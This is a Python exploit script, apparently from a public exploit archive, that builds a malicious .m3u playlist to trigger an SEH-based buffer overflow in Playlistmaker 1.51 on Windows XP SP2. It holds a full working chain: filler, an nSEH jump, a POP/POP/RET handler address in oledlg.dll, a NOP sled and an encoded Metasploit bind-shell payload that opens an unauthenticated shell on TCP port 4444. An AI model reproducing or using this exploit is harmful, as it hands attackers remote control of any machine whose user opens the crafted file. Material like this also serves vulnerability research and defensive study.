
# Title : Playlistmaker 1.51 (.m3u File) Local Buffer Overflow Exploit (SEH)
# Published : 2009-08-18
# Author : Blake


# Playlistmaker version 1.51
# Tested on Windows XP SP2 (English)
# Exploit originally discovered by ThE g0bL!N/exploited by germaya_x

# I could not get germaya_x's exploit to work on XP SP3.
# The only usable POP/POP/RET I could find is in oledlg.dll, which appears
# to be SafeSEH-registered on XP SP3 (so the handler address is not honoured
# there). On XP SP2 oledlg.dll is usable, hence the SP2-specific address below.


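# Banner. Single-argument print() behaves the same under Python 2 and 3.
print("\n========================")
print("Playlistmaker v1.5 (SEH)")
print("Exploit written by Blake")
print("Discovered by ThE g0bL!N")
print("========================\n")

# windows/shell_bind_tcp - 696 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
#
# NOTE: this payload opens an UNAUTHENTICATED bind shell on TCP/4444 -- anyone
# who can reach that port after the playlist is opened gets a shell. Use it
# only on an isolated lab host. The first few non-alphanumeric bytes look like
# the encoder's GetPC stub; the rest is the alphanumeric-encoded payload, so
# the buffer contains no 0x00 or 0x0a bytes that a text parser could truncate.
shellcode = (
    b"\x89\xe2\xdb\xce\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    b"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b"
    b"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x46\x44\x47\x54\x4c\x4b"
    b"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x43\x31\x4a"
    b"\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31"
    b"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x46"
    b"\x51\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43\x37"
    b"\x49\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
    b"\x4b\x46\x34\x47\x54\x47\x58\x43\x45\x4d\x35\x4c\x4b\x51\x4f"
    b"\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c"
    b"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
    b"\x4c\x49\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x46\x51\x49"
    b"\x4b\x43\x54\x4c\x4b\x51\x53\x50\x30\x4c\x4b\x47\x30\x44\x4c"
    b"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x45\x58\x51"
    b"\x4e\x42\x48\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
    b"\x49\x46\x42\x46\x50\x53\x42\x46\x45\x38\x50\x33\x50\x32\x42"
    b"\x48\x42\x57\x43\x43\x46\x52\x51\x4f\x50\x54\x4b\x4f\x4e\x30"
    b"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x4e"
    b"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x44\x48"
    b"\x45\x52\x51\x45\x42\x4a\x44\x42\x4b\x4f\x4e\x30\x45\x38\x48"
    b"\x59\x45\x59\x4c\x35\x4e\x4d\x46\x37\x4b\x4f\x48\x56\x51\x43"
    b"\x50\x53\x46\x33\x46\x33\x51\x43\x50\x43\x51\x43\x51\x53\x46"
    b"\x33\x4b\x4f\x4e\x30\x43\x56\x43\x58\x44\x51\x51\x4c\x42\x46"
    b"\x50\x53\x4b\x39\x4b\x51\x4a\x35\x42\x48\x4e\x44\x45\x4a\x44"
    b"\x30\x49\x57\x46\x37\x4b\x4f\x49\x46\x42\x4a\x44\x50\x46\x31"
    b"\x46\x35\x4b\x4f\x48\x50\x45\x38\x4e\x44\x4e\x4d\x46\x4e\x4b"
    b"\x59\x46\x37\x4b\x4f\x4e\x36\x50\x53\x51\x45\x4b\x4f\x4e\x30"
    b"\x45\x38\x4d\x35\x47\x39\x4d\x56\x47\x39\x50\x57\x4b\x4f\x4e"
    b"\x36\x50\x50\x51\x44\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
    b"\x42\x48\x4b\x57\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x49"
    b"\x46\x51\x45\x4b\x4f\x48\x50\x43\x56\x43\x5a\x42\x44\x45\x36"
    b"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x42\x4a\x50\x50\x51"
    b"\x49\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x50\x44\x4d\x59"
    b"\x4d\x32\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32\x46"
    b"\x4d\x4b\x4e\x47\x32\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x47\x48"
    b"\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b\x4e\x48\x33\x45"
    b"\x46\x4b\x4f\x43\x45\x50\x44\x4b\x4f\x4e\x36\x51\x4b\x50\x57"
    b"\x50\x52\x50\x51\x50\x51\x46\x31\x42\x4a\x45\x51\x50\x51\x46"
    b"\x31\x46\x35\x50\x51\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x49\x49"
    b"\x45\x55\x48\x4e\x51\x43\x4b\x4f\x4e\x36\x43\x5a\x4b\x4f\x4b"
    b"\x4f\x50\x37\x4b\x4f\x48\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43"
    b"\x48\x44\x43\x54\x4b\x4f\x48\x56\x46\x32\x4b\x4f\x4e\x30\x43"
    b"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x49\x46"
    b"\x4b\x4f\x4e\x30\x41\x41"
)


def build_payload():
    """Return the complete .m3u contents as bytes.

    Layout, by offset from the start of the file:
      0    .. 991   filler ('A' * 992), reaches the SEH record
      992  .. 995   nSEH: `jmp short +9` plus two NOPs
      996  .. 999   SEH handler: POP/POP/RET in oledlg.dll (0x74d31567,
                    stored little-endian), XP SP2 English only
      1000 .. 1019  NOP sled (the short jump lands 3 bytes into it)
      1020 .. 1715  shellcode

    The handler address is module- and service-pack-specific: on XP SP3
    oledlg.dll is SafeSEH-registered and the overwritten handler is ignored.
    Returns bytes so the caller can write it without any text-mode
    newline translation or locale encoding.
    """
    filler = b"\x41" * 992                 # pad up to the SEH record
    nseh = b"\xeb\x09\x90\x90"             # jmp short +9 -> skips handler into sled
    seh_handler = b"\x67\x15\xd3\x74"      # 0x74d31567 POP/POP/RET (oledlg.dll)
    nop_sled = b"\x90" * 20
    return filler + nseh + seh_handler + nop_sled + shellcode


def main():
    """Write the malicious playlist to exploit.m3u in the current directory."""
    payload = build_payload()
    print("[+] Creating exploit file")
    try:
        # Binary mode: on Windows, text mode would rewrite any 0x0a byte as
        # 0x0d 0x0a and shift every offset after it (and Python 3 would
        # refuse to write bytes to a text handle at all).
        with open("exploit.m3u", "wb") as fh:
            fh.write(payload)
    except IOError as exc:
        # Report the cause instead of swallowing every exception silently.
        print("[x] Error creating file! (%s)" % exc)
        return
    print("[+] Exploit file created")


if __name__ == "__main__":
    main()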

# www.Syue.com [2009-08-18]